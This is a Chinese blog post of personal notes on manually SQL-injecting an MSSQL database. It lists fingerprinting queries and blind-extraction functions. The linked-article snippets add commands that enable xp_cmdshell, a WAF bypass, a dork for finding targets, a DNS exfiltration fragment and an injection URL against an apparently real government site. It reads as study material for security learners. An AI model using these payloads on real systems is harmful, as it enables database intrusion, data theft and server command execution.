记录一次手工注入Mssql数据库的过程

最新推荐文章于 2023-09-15 11:19:05 发布
最新推荐文章于 2023-09-15 11:19:05 发布
阅读量257 收藏 1
点赞数
分类专栏: 漏洞挖掘
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40989258/article/details/98752813
版权

Mssql数据库基本信息

select @@servername/host_name() 

运行 SQL Server 的本地服务器的名称 

select @@version 

SQL Server 的当前安装的系统和生成信息 

select user 

dbo 

select user_name() 

根据指定的标识号返回数据库用户名,如dbo 

select suser_name()/suser_sname() 

sa 

select system_user 

当前系统用户名,如admin-pc\admin或者sa 

select current_user 

等价于user_name() 

select session_user 

当前数据库中当前上下文的用户名 

select db_name()/db_name(0),db_name(1).. 

数据库名称 

select convert(varchar(max),pwdencrypt('pwd'),2) 

返回当前版本的输入值的密码哈希(varbinary(128)) 

select is_srvrolemember('sysadmin') 

select name from master.dbo.syslogins where sysadmin=1 

返回1表示是sysadmin,返回0表示表示不是 

select loginame from master..sysprocesses where spid=@@spid 

返回当前用户 

select serverproperty('productversion') 

12.0.5000.0 

select serverproperty('productlevel') 

SP2 

select serverproperty('edition') 

Enterprise Edition (64-bit) 

使用len函数查询数据库长度为6

然后用ascii跑数据库名,user_name第一位是d

主要学习了在mssql中的substring函数是这样用的,不要用混:

类似A='BCDEFG'

substring(A,1,1)

输出B

 

 

 

daxi0ng
关注
专栏目录
MSSQL注入手工注入mssql提权
代码审计
04-18 2290
mssql数据库 mssql数据库相比mysql数据库本质上的框架是差不多的,使用的增,删,改,查命令是互相通的,mysql中使用的函数在mssql中有些会起不到作用点。 MSSQL数据库的基本知识 MSSQL中自带数据库信息 库名 相关功能 master 系统控制数据库,包含配置信息,用户登录信息,系统运行状态 model 模板数据库数据库时建立所有数据库的模板。 tempdb 临时容器,保存所有的临时表,存储过程和其他程序交互的临时文件 msdb 主要为用户使用,记录着计划
mssql和mysql注入区别_Mssql手工注入小结
weixin_31623343的博客
02-01 578
前言:说起sql注入环境,网上流行的一些漏洞靶场基本上都是基于Mysql+Apache搭建的,所以我对mysql的手注及提权多多少少有一定的了解,但对mssql还很陌生,为了避免过度依赖sqlmap一把梭的尴尬局面,于是有了这篇文章。环境介绍:搭建环境:win7 + SQL Server 2008 R2 + IIS7.5win7开放1433端口sql server 2008 r2下载及搭建过程参考...
(转-收集)MSSQL手工注入语句集合
weixin_30553837的博客
04-16 267
andexists(select*fromsysobjects)//判断是否是MSSQL andexists(select*fromtableName)//判断某表是否存在..tableName为表名 and1=(select@@VERSION)//MSSQL版本 And1=(selectdb_name())//当前数据库名 and1=(select@...
MSSQL2005 手工盲注教
harryxlb的专栏
10-27 523
一.开启扩展   1.开启xp_cmdshell   EXEC sp_configure ’show advanced options’, 1;RECONFIGURE;EXEC sp_configure ‘xp_cmdshell’, 1;RECONFIGURE;–   关闭xp_cmdshell  EXEC sp_configure ’show advanced options’,
MSSQL2005 手工盲注详解
security2864的博客
12-16 464
MSSQL2005 手工盲注详解 一.开启扩展 1.开启xp_cmdshell EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;-- 2.开启’OPENROWSET’ exec sp_configure 'show advanced op...
注入之mssql数据库手工注入
最新发布
2301_79194110的博客
09-15 269
恢复 EXEC sp_configure 'show advanced options', 1;-- 判断当前数据库用户是否为db_owner权限。insert into black exec master..xp_cmdshell 'dir /s c:\1.aspx'-- 当前库testDB。没有xp_cmdshell。
MsSQL手工注入
08-20
根据提供的文件信息,本文将对“MsSQL手工注入”这一主题进行深入解析,涉及的知识点主要包括:手工注入的基础概念、MsSQL环境下常见的手工注入方法、手工注入的具体实践案例以及安全防范措施。 ### 一、手工注入的...
MsSql手工注入——————笔记
tell_me_404的博客
02-27 462
一、mssql的基本介绍 access :多为asp脚本 Mssql : 多为aspx动态脚本语言 适用于中小型企业,学校(也有oracle) 基要:(默认端口1433,文件.mdf(数据库) .ldf(日志) mssql简单操作 1、新建数据库:设置列名表名和内容及其它 -------占用状态下不能删除,故分离 2、删除数据库:分离-删除连接和源路径文件 3、复制数据库:分离-复制源路径文件...
手工注入教程 sql数据库注入
10-31
### 手工SQL注入教程详解 #### 一、引言 随着互联网技术的快速发展,网络安全问题日益凸显。其中,SQL注入攻击作为一种常见的攻击方式,在网络安全领域占据着重要的位置。SQL注入利用应用程序对用户输入的数据处理...
MSSQL数据库注入(一)
hhhshd的博客
11-17 5449
1. MSSQL注入手工联合注入 mssql数据库相比mysql数据库本质上的框架是差不多的,使用的增,删,改,查命令是互相通的,mysql中使用的函数在mssql中有些会起不到作用点。 (例如:在mssql中只能用top 取代limt 0,N,row_number() over()函数取代limit N,M) mssql在使用上和可移植等方面与mysql存在不同的差异。 MSSQL数据库的基本知识 MSSQL中自带数据库信息 库名 相关功能 master 系统控制数据库,包含配置信
一次mssql手工注入
Matthew
04-04 9409
一次mssql手工注入 记录一次mssql注入过程,很多都是久的知识,大家当温故而知新吧。 xxxx/xxx?nIDX=122‘ 注入报错,直接sqlmap跑,但有waf拦截; 只能进行fuzz了,发现select 和 from之间用/**/就可以绕过。 (1)首先查看版本号: 由于是数字型的报错,不用闭合单引号。直接@@version先查看版本号: Microsoft OLE ...
mssql手工注入
一个码农的笔记
10-11 1万+
报错注入: 例子:www.kfgtfcj.gov.cn/lzygg/Zixun_show.aspx?id=1 【1】首先版本:http://www.kfgtfcj.gov.cn/lzygg/Zixun_show.aspx?id=1 and @@version>0 报错信息:在将 nvarchar 值 'Microsoft SQL Server 2008 R2 (RTM) - 10.50.1
SQL语句实现查询SQL Server服务器名称和IP地址_MsSql
梁中林 的专栏
04-28 1万+
转载:https://edu.aliyun.com/a/12773获取服务器名称:SELECT SERVERPROPERTY('MachineName') select @@SERVERNAME select HOST_NAME()获取IP地址可以使用xp_cmdshell执行ipconfig命令:--开启xp_cmdshell exec sp_configure'show advanced o...
SQL手工注入基础详解----MSSQL
热门推荐
xabc3000的专栏
05-30 2万+
作者:DragonEgg 信息来源: 噩靈戰隊[Evil-Soul Security Team] http://bbs.x-xox-x.com/      一:注入点的判断      当我们在URL后特殊字符或语句,使其报错时,若在返回的信息中有类似“[Microsoft][ODBC SQL Server Driver][SQL Server]”的字样,关键在于:“Microsoft”和“S
黑客注入手工注入
追智的专栏
08-24 516
先找注入点 inurl:asp?id=9 http://www.hsqs.com/tipsview.asp?id=9 猜表名 and (select count(*) from 表名)>0 猜列名 and (select count(列名) from 表名)>0 猜长度 and (select top 1 len(username) from admin)>5 userna
mssql手工盲注
weixin_30929295的博客
05-24 385
遇到中文的列名 利用unicode 进行单字节的转换 declare @s varchar(50);set @s = N'拉';select UniCode(@s),nchar(UniCode(@s)); 绕狗sql 方法 利用dnslog 进行sql 1 /xx.aspx?id=1'--/%2a%0a%3bDECLARE+%40host+varchar(1024)...
高级的MSSQL注入技巧
CanMeng'Blog - 一个WEB安全渗透的技术爱好者
11-30 465
tl;dr 本文列举了几种改进的MSSQL注入技巧,所有的攻击向量都至少在三个最新版本的Microsoft SQL Server上进行了测试:2019、2017、2016SP2。 DNS Out-of-Band 如果遇到带有禁用堆栈查询的完全盲SQL注入,则可以通过函数 fn_xe_file_target_read_file, fn_get_audit_file,和fn_trace_gettable实现DNS带外(OOB)数据泄露。 利用fn_xe_file_target_read_file()的例子
MSSQL数据库SQL注入攻击指南
4. MSSQL数据库SQL注入检测:包括如何使用日志记录、审核和监控来检测SQL注入攻击。 在本手册中,我们还提供了一些有用的语法提示和示例,旨在帮助开发者和安全测试者更好地理解和防止SQL注入攻击。 例如,在MSSQL...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值